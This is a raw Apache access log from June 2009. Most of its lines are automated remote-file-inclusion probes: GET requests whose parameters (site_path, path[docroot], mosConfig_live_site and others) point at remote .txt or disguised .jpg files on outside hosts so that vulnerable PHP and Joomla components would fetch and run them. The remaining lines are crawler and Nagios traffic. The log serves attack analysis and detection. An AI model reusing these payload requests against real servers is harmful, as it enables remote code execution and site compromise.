65.98.59.178 - - [19/Jun/2009:03:40:41 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.811"
123.143.98.5 - - [19/Jun/2009:03:40:55 -0400] "GET ///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:40:55 -0400] "GET /logs///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:40:55 -0400] "GET /logs/access_log.Q109010700%20%20///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:40:57 -0400] "GET /logs/access_log.Q109010700%20%20///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:40:57 -0400] "GET /logs///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:40:57 -0400] "GET ///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:41:19 -0400] "GET /logs///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:41:19 -0400] "GET ///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:41:19 -0400] "GET /logs/access_log.Q109010700///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:03:41:22 -0400] "GET /logs/access_log.Q107072300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
123.143.98.5 - - [19/Jun/2009:03:41:24 -0400] "GET /logs/access_log.Q109010700///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:41:24 -0400] "GET /logs///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:41:24 -0400] "GET ///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:41:46 -0400] "GET ////?sIncPath=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:41:46 -0400] "GET /logs/access_log.Q109053100%20%20////?sIncPath=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:41:46 -0400] "GET /logs////?sIncPath=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 200 6115 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:41:46 -0400] "GET /logs/access_log.Q109060900%20%20////?sIncPath=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:41:57 -0400] "GET /logs/access_log.Q109050300/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.55.29.146 - - [19/Jun/2009:03:42:04 -0400] "GET /logs/access_log.Q109051600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [19/Jun/2009:03:42:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.59.178 - - [19/Jun/2009:03:42:04 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://yongsin.es.kr/sk.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
218.234.21.178 - - [19/Jun/2009:03:42:13 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.234.21.178 - - [19/Jun/2009:03:42:13 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.234.21.178 - - [19/Jun/2009:03:42:14 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
78.40.226.135 - - [19/Jun/2009:03:42:16 -0400] "GET //?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:16 -0400] "GET /logs/access_log.Q109010700//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:16 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:42:17 -0400] "GET ///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:42:17 -0400] "GET /logs/access_log.Q109010700///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:42:17 -0400] "GET /logs///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:20 -0400] "GET //?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:20 -0400] "GET //?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:20 -0400] "GET /logs/access_log.Q109010700//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:20 -0400] "GET /logs//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:22 -0400] "GET //?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:22 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:22 -0400] "GET /logs/access_log.Q109010700//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:23 -0400] "GET //?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:23 -0400] "GET //?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:42:25 -0400] "GET /logs/access_log.Q109060700%20%20///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.249.71.54 - - [19/Jun/2009:03:42:25 -0400] "GET /images/over-index10_atlas.jpg HTTP/1.1" 200 2631 "-" "Googlebot-Image/1.0"
78.40.226.135 - - [19/Jun/2009:03:42:25 -0400] "GET /logs//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:25 -0400] "GET /logs/access_log.Q109010700%20%20//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:25 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:25 -0400] "GET /logs/access_log.Q109010700%20%20//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:26 -0400] "GET /logs/access_log.Q109010700%20%20//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:42:26 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:42:32 -0400] "GET /logs/access_log.Q109060700%20%20///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.38.16.107 - - [19/Jun/2009:03:42:33 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:42:42 -0400] "GET ///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:42:49 -0400] "GET ///?path%5Bdocroot%5D=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:42:49 -0400] "GET /logs/access_log.Q109010700///?path%5Bdocroot%5D=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:42:49 -0400] "GET /logs///?path%5Bdocroot%5D=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:42:51 -0400] "GET /logs/access_log.Q109010700%20%20///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:42:51 -0400] "GET /logs///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
218.234.21.178 - - [19/Jun/2009:03:42:51 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
211.49.99.7 - - [19/Jun/2009:03:43:03 -0400] "GET /logs/access_log.Q109052900%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:43:04 -0400] "GET /logs/access_log.Q109050300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.43.202.66 - - [19/Jun/2009:03:43:04 -0400] "GET /logs/access_log.Q109060500//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.234.21.178 - - [19/Jun/2009:03:43:14 -0400] "GET /logs/access_log.Q109051900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
203.94.155.59 - - [19/Jun/2009:03:43:24 -0400] "GET //?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:43:24 -0400] "GET /logs/access_log.Q109010700//?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:43:24 -0400] "GET /logs//?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
211.49.99.7 - - [19/Jun/2009:03:43:33 -0400] "GET /logs/access_log.Q109052900%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://levraicyrano.fr/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:43:37 -0400] "GET /logs/access_log.Q109060700///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:43:37 -0400] "GET ///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:43:37 -0400] "GET /logs///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:43:42 -0400] "GET /logs/access_log.Q109010700%20%20///?path%5Bdocroot%5D=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.222.190.185 - - [19/Jun/2009:03:43:58 -0400] "GET /logs/access_log.Q109051200/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.hb.let.tw/xoops_data/fx29id.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:44:08 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:44:23 -0400] "GET /logs/access_log.Q109060700///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:44:24 -0400] "GET /logs///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:44:24 -0400] "GET ///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:44:27 -0400] "GET ///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:44:27 -0400] "GET /logs/access_log.Q109060700///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:44:27 -0400] "GET /logs///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:03:44:33 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:44:48 -0400] "GET /logs/access_log.Q109060700%20%20///?path%5Bdocroot%5D=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:03:44:53 -0400] "GET /images/contact_mail_over.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
123.143.98.5 - - [19/Jun/2009:03:44:56 -0400] "GET /logs/access_log.Q109060900///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:45:02 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:45:02 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:45:02 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:45:07 -0400] "GET /logs/access_log.Q109060700%20%20///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:45:10 -0400] "GET /logs/access_log.Q109060900///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
38.99.13.118 - - [19/Jun/2009:03:45:14 -0400] "GET /logs/access_log.Q108071000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
203.94.155.59 - - [19/Jun/2009:03:45:23 -0400] "GET //?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:45:23 -0400] "GET /logs/access_log.Q109010700%20%20//?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:45:23 -0400] "GET /logs//?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:45:26 -0400] "GET //?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:45:26 -0400] "GET /logs//?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 6113 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:45:26 -0400] "GET /logs/access_log.Q109060700//?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:45:28 -0400] "GET /logs/access_log.Q109051300//////?DOCUMENT_ROOT=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:45:38 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:45:43 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:45:43 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:45:44 -0400] "GET /logs/access_log.Q109010700///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:45:44 -0400] "GET ///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:45:44 -0400] "GET /logs///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:45:44 -0400] "GET ///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:45:47 -0400] "GET /logs/access_log.Q109053100////?sIncPath=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
94.23.200.54 - - [19/Jun/2009:03:45:47 -0400] "GET /logs/access_log.Q109060100////?sIncPath=http://www.harzer-nachrichten.de///userimages/sub/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:45:49 -0400] "GET /logs///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
201.232.54.48 - - [19/Jun/2009:03:45:49 -0400] "GET /logs/access_log.Q109010700%20%20///?path%5Bdocroot%5D=http://kudacuki.ucoz.com/id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:45:51 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:45:51 -0400] "GET /lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:45:51 -0400] "GET /logs/access_log.Q109061200/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.94.155.59 - - [19/Jun/2009:03:46:12 -0400] "GET /logs/access_log.Q109060900//?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:46:21 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:46:30 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:46:48 -0400] "GET /logs/access_log.Q109060600/lostpasswd.php?env[include_prefix]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.15.254.22 - - [19/Jun/2009:03:46:52 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:46:54 -0400] "GET /logs/access_log.Q109060700%20%20//?path%5Bdocroot%5D=http://yildizmotor.net/images/header.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.40.226.135 - - [19/Jun/2009:03:46:54 -0400] "GET /logs/access_log.Q109060700%20%20//?path%5Bdocroot%5D=http://www.barrioarroyodulce.com.ar/media/header.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:57 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:57 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:57 -0400] "GET /logs/access_log.Q109052100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:58 -0400] "GET ///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:58 -0400] "GET /logs/access_log.Q109060700///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:58 -0400] "GET /logs///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:58 -0400] "GET ///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:58 -0400] "GET /logs/access_log.Q109060700///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:58 -0400] "GET /logs///?path%5Bdocroot%5D=http://yoursupplements4you.com/wp-content/themes/bluebrush/images/img08.jpg???? HTTP/1.1" 200 6114 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:59 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:46:59 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [19/Jun/2009:03:47:04 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
